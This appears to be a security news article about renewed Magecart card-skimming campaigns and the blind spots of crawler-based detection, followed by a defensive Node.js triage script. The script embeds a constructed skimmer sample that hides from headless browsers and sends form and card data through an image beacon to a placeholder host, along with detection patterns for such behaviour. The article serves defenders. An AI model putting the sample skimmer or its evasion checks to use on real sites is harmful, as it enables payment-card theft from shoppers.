Magecart attacks are decreasing in number but are becoming more stealthy, with researchers highlighting potential server-side blindspots in tracking them.
It's not too often you hear about Magecart attacks. In the past few years, cybersecurity incidents that hit the headlines tended to involve attacks on core utilities and critical services, state-sponsored campaigns, ransomware, massive data breaches, and disruption on a broader scale than the issues that Magecart victims today often experience.
However, this doesn't mean that the problem has gone away, and we shouldn't forget that it's not only SMBs at risk: big brands have fallen prey to this type of cyberattack in the past, including British Airways, Newegg, and Ticketmaster.
In a Magecart attack, malicious JavaScript known as a skimmer is injected into the payment section of a website. The skimmer harvests any card details a customer enters into the checkout form and sends them to an attacker-controlled server, usually without any visible change to the page.
On June 20, Malwarebytes researcher Jérôme Segura said in a blog post that while Magecart attack rates appear to have diminished, recent reports suggest the market for stolen credit card information is still considered worthwhile – and a new campaign has shown that some operations still operate a "pretty wide infrastructure."
Malwarebytes investigated the reports and, because the skimmer domains in the reported cases sat on the same autonomous system number (ASN), connected them to a larger campaign.
The cybersecurity researchers combed back through their records and linked the recent Magecart activity to a campaign from 2021, which hosted a skimmer able to detect whether it was running inside a virtual machine (VM). A check of that kind lets a skimmer stay dormant when it is loaded by an analysis sandbox or an automated crawler, so that only real shoppers ever see it fire.
While the reason is unclear, the VM-detection code has since been removed from the skimmer, and the new skimmer uses different naming schemes. There were nonetheless enough clues to point Malwarebytes toward a range of URLs, some of which were malicious.
This new campaign's activity is suspected of going back to at least May 2020.
A challenge in tracking the current trajectory of Magecart attacks, however, is the gap in visibility between client-side and server-side skimming. A client-side skimmer is JavaScript delivered to the shopper's browser, so scanners and crawlers that load the page can see it. A server-side skimmer intercepts the card data on the compromised web server itself, before any response reaches the browser, so nothing observable is delivered to the client and those same tools see a clean page.
"If the Magecart threat actors decided to switch their operations exclusively server-side then the majority of companies, including ours, would lose visibility overnight," Segura commented. "This is why we often look up to researchers that work the website cleanups. If something happens, these guys would likely notice it. For now, we can say that Magecart client-side attacks are still around and that we could easily be missing them if we rely on automated crawlers and sandboxes, at least if we don't make them more robust."
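As an added example (not code from the Malwarebytes post or from this article), the following Node.js script shows the kind of static triage a crawler could run over the scripts it collects from a checkout page: it scores each script for payment-field harvesting, exfiltration, and the VM/automation checks of the sort described above. The indicator names, their weights, and both sample scripts are this example's own constructions, not a published signature set or real skimmer code.

```javascript
// Added example, not code from the Malwarebytes post: a static triage pass that
// scores a JavaScript source for the three things a Magecart skimmer must do
// (harvest payment fields, exfiltrate them, and, as in the 2021 campaign
// described above, stay dormant when it detects a VM or automated browser).
// The indicator list and weights are this example's own assumptions, not a
// published signature set, and the two sample scripts below are constructed.

const INDICATORS = [
  // Harvesting: reads payment form fields by name/id or serialises inputs wholesale.
  { name: "card-field-access", kind: "harvest", weight: 3,
    re: /(cc[-_]?num|card[-_]?number|cvv|cvc|exp(ir)?[-_]?(date|month|year))/i },
  { name: "form-serialisation", kind: "harvest", weight: 2,
    re: /\b(querySelectorAll|getElementsByTagName)\s*\(\s*['"](input|select|form)['"]/ },
  // Exfiltration: image-beacon GET, fetch/XHR/sendBeacon, and base64 packing of the payload.
  { name: "exfil-image-beacon", kind: "exfil", weight: 3,
    re: /new\s+Image\s*\(\s*\)[\s\S]{0,80}\.src\s*=/ },
  { name: "exfil-network-call", kind: "exfil", weight: 2,
    re: /\b(fetch|XMLHttpRequest|sendBeacon)\b/ },
  { name: "base64-encoding", kind: "exfil", weight: 1, re: /\bbtoa\s*\(/ },
  // Evasion: fingerprints automation, headless browsers, VMs or open devtools
  // so the skimmer can stay silent under a crawler or sandbox.
  { name: "evasion-webdriver", kind: "evasion", weight: 3, re: /navigator\.webdriver/ },
  { name: "evasion-headless-ua", kind: "evasion", weight: 2,
    re: /(HeadlessChrome|PhantomJS|Selenium)/ },
  { name: "evasion-vm-or-screen", kind: "evasion", weight: 2,
    re: /(screen\.(width|height)|WEBGL_debug_renderer_info|SwiftShader|VMware|VirtualBox)/i },
  { name: "evasion-devtools", kind: "evasion", weight: 1,
    re: /outerWidth\s*-\s*(window\.)?innerWidth/ },
];

// Score one script body. A script is "skimmer-like" only when it both harvests
// and exfiltrates; evasion alone is common in benign anti-bot code, so it is
// reported separately as `evasive` rather than driving the verdict.
function triageScript(source) {
  const matched = INDICATORS.filter(ind => ind.re.test(source));
  const kinds = new Set(matched.map(ind => ind.kind));
  const score = matched.reduce((sum, ind) => sum + ind.weight, 0);
  let verdict = "benign";
  if (kinds.has("harvest") && kinds.has("exfil")) verdict = "skimmer-like";
  else if (score >= 4) verdict = "suspicious";
  return { score, verdict, evasive: kinds.has("evasion"), matched: matched.map(ind => ind.name) };
}

// Constructed sample: the shape of a client-side skimmer with a VM/automation
// gate in front of it. The exfil host is a reserved .invalid name, not a real server.
const SKIMMER_SAMPLE = `
if (navigator.webdriver || /HeadlessChrome/.test(navigator.userAgent)) {
  // automation detected: do nothing, so a crawler sees an inert script
} else {
  document.addEventListener("submit", function () {
    var inputs = document.querySelectorAll("input"), data = {};
    for (var i = 0; i < inputs.length; i++) data[inputs[i].name] = inputs[i].value;
    if (data.cardnumber && data.cvv) {
      var img = new Image();
      img.src = "https://cdn-static.invalid/pixel.gif?d=" + btoa(JSON.stringify(data));
    }
  });
}`;

// Constructed sample: a benign performance beacon, which also "sends data
// somewhere" but never touches payment fields.
const BENIGN_SAMPLE = `
window.addEventListener("load", function () {
  navigator.sendBeacon("/metrics", JSON.stringify({ page: location.pathname, t: performance.now() }));
});`;

// Walk a bundle of scripts (as a crawler would after loading a checkout page)
// and return only the ones worth an analyst's time.
function flagScripts(scripts) {
  return scripts
    .map(s => ({ id: s.id, ...triageScript(s.source) }))
    .filter(r => r.verdict !== "benign");
}

const FLAGGED = flagScripts([
  { id: "checkout-addon.js", source: SKIMMER_SAMPLE },
  { id: "perf-beacon.js", source: BENIGN_SAMPLE },
]);
console.log(JSON.stringify(FLAGGED, null, 2));
```

Run it with `node`. The evasion indicators are the ones that bear on Segura's point about robustness: a skimmer gated on `navigator.webdriver` or a headless user agent looks inert to a stock headless crawler, so a sandbox has to either mask those signals or treat their presence in a third-party checkout script as a finding in its own right. Regex triage is deliberately cheap and will miss obfuscated code (names assembled with `String.fromCharCode`, for instance), so it is a first pass for prioritising manual review, not a verdict.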